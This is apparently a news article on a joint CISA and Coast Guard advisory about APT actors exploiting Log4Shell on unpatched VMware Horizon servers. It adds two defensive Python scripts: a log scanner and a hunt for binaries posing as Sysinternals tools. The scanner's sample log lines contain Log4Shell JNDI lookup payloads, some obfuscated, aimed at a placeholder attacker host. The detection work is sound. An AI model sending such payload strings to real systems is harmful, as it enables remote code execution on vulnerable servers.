Cybercriminals Continue to Exploit the Log4Shell Vulnerability on VMware Horizon Systems

The US Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) have announced in a joint cybersecurity advisory (CSA) that the Log4Shell vulnerability (CVE-2021-44228) is still being exploited by attackers.

The hacker groups found to be still exploiting this weakness are advanced persistent threat (APT) actors, and they have been observed attacking VMware Horizon servers and Unified Access Gateway (UAG) appliances to gain initial access to organizations that had not applied the available patches.

The CSA provides information, including tactics, techniques and procedures (TTPs) and indicators of compromise (IoCs), drawn from two incident response engagements and from malware analysis of samples recovered from victim networks.

Related article:
Log4Shell, a critical vulnerability in Apache Log4j 2 that affects many Java projects

For those unfamiliar with Log4Shell, it is a vulnerability that first surfaced in December and drew a great deal of attention because it sits in Apache Log4j, a very popular logging framework for Java applications. It allows arbitrary code to be executed when a specially formatted value is written to the log in the form "${jndi:URL}".

The vulnerability is notable because the attack works against any Java application that logs values received from external sources, for example when problematic values are echoed back in error messages.
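As an added example (not part of the original article or the advisory), the following Python script shows the detection side of the lookup mechanism just described: it scans web server log lines for the "${jndi:...}" pattern after undoing the two evasions defenders most often see, URL encoding and nested Log4j lookups such as ${lower:j} or ${::-j} wrapped around the keyword. The log lines and host names are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines (not from the advisory); host names are placeholders.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:14 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.7 - - [10/Dec/2021:13:02:15 +0000] "GET /api?q=${env:HOME} HTTP/1.1" 200 10 "-" "-"',
]

# Log4j lookups commonly wrapped around the "jndi" keyword to defeat naive string
# matching: ${lower:x} / ${upper:x} and the default-value form ${::-x}.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}:]*:+-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode repeatedly, then resolve nested Log4j lookups innermost-first."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            return text
        text = new


def find_jndi_lookups(lines):
    """Return (line_index, normalized_lookup) for every line containing a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        for match in _JNDI.finditer(normalize(line)):
            hits.append((index, match.group(0)))
    return hits


if __name__ == "__main__":
    for index, lookup in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {index}: {lookup}")
```

The normalization step matters more than the final regex: a rule that only matches the literal string "${jndi:" misses the third and fourth sample lines, while the decoded and flattened form of both reduces to the same plain lookup as the second line.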

It appears that almost every project built on frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink is affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The full advisory describes several recent incidents in which cybercriminals successfully used the vulnerability to gain access. In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the victim's network.

Threat hunting carried out by the US Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial network access to an undisclosed victim. They uploaded a malware file named "hmsvc.exe", which masquerades as the Microsoft Windows Sysinternals LogonSessions security utility.

The malware embeds a range of capabilities, including keystroke logging and the launching of additional payloads, and provides a graphical user interface for accessing the victim's Windows desktop. It can act as a command-and-control tunneling proxy, allowing a remote operator to pivot further into the network, the agencies said.

The analysis also found that hmsvc.exe was running as a local system account with the highest level of privilege, but did not explain how the attackers elevated their privileges to that level.
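As an added example (not from the article or the advisory), here is a small hunting routine that turns the two observations above, a binary posing as a Sysinternals tool and a SYSTEM-level process running from an unexpected location, into checks over a process inventory. The process records, including every attribute shown for hmsvc.exe (path, version-info fields, signer), are constructed for illustration and are not the real sample's properties.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Signers that legitimately sign Sysinternals tools and Windows binaries.
MICROSOFT_SIGNERS = {"microsoft corporation", "microsoft windows"}
# Directories from which a SYSTEM-level process is normally expected to run.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class ProcessRecord:
    name: str               # image file name
    path: str               # full image path
    description: str        # FileDescription from the PE version resource
    original_filename: str  # OriginalFilename from the PE version resource
    signer: Optional[str]   # Authenticode signer, None if unsigned
    user: str               # account the process runs as


# Constructed inventory; the hmsvc.exe attributes are hypothetical, not the real sample's.
SAMPLE_PROCESSES = [
    ProcessRecord("svchost.exe", r"C:\Windows\System32\svchost.exe",
                  "Host Process for Windows Services", "svchost.exe",
                  "Microsoft Windows", r"NT AUTHORITY\SYSTEM"),
    ProcessRecord("logonsessions64.exe", r"C:\Tools\Sysinternals\logonsessions64.exe",
                  "LogonSessions - Sysinternals", "logonsessions64.exe",
                  "Microsoft Corporation", r"CORP\it-admin"),
    ProcessRecord("hmsvc.exe", r"C:\Users\Public\hmsvc.exe",
                  "LogonSessions - Sysinternals", "logonsessions.exe",
                  None, r"NT AUTHORITY\SYSTEM"),
]


def masquerade_findings(p: ProcessRecord) -> List[str]:
    """Return the reasons a process looks like a masquerading binary (empty if none)."""
    findings = []
    signer = (p.signer or "").lower()
    # A Sysinternals tool is always Microsoft-signed; a claim without the signature is a red flag.
    if "sysinternals" in p.description.lower() and signer not in MICROSOFT_SIGNERS:
        findings.append("claims to be a Sysinternals tool but is not Microsoft-signed")
    # Renamed binaries keep the OriginalFilename of the program they were built as.
    if p.original_filename.lower() != p.name.lower():
        findings.append(f"file name differs from OriginalFilename ({p.original_filename})")
    # SYSTEM-level processes from user-writable directories deserve a look.
    if p.user.lower() == "nt authority\\system" and not p.path.lower().startswith(TRUSTED_DIRS):
        findings.append("runs as SYSTEM from a non-standard directory")
    return findings


def hunt(records: List[ProcessRecord]) -> Dict[str, List[str]]:
    """Map each suspicious process name to its findings; clean processes are omitted."""
    results = {}
    for p in records:
        findings = masquerade_findings(p)
        if findings:
            results[p.name] = findings
    return results


if __name__ == "__main__":
    for name, findings in hunt(SAMPLE_PROCESSES).items():
        print(name)
        for f in findings:
            print("  -", f)
```

On a real host the fields come from the process list plus the PE version resource and Authenticode verification of each image; the value of the routine is that none of the three checks depends on a hash, so a recompiled sample that keeps the same disguise still trips them.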

CISA and the Coast Guard recommend that all organizations install the updated builds so that affected VMware Horizon and UAG systems run the latest version.

The advisory adds that organizations should always keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be reduced by hosting essential services in a segregated demilitarized zone (DMZ).

"Based on the number of Horizon servers in our unpatched dataset (only 18% patched as of last Friday night), there is a high risk that this will adversely affect hundreds, if not thousands, of businesses. This weekend also marks the first time we have seen evidence of widespread escalation, from initial access to the start of hostile actions on Horizon servers."

Doing so enforces strict access controls at the network perimeter and avoids hosting internet-facing services that are not essential to business operations.

CISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not applied immediately after VMware released its updates for Log4Shell, treat all affected VMware systems as compromised. See the CSA "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems" for more information and additional recommendations.

Finally, if you would like to know more about this, you can check the details at the following link.

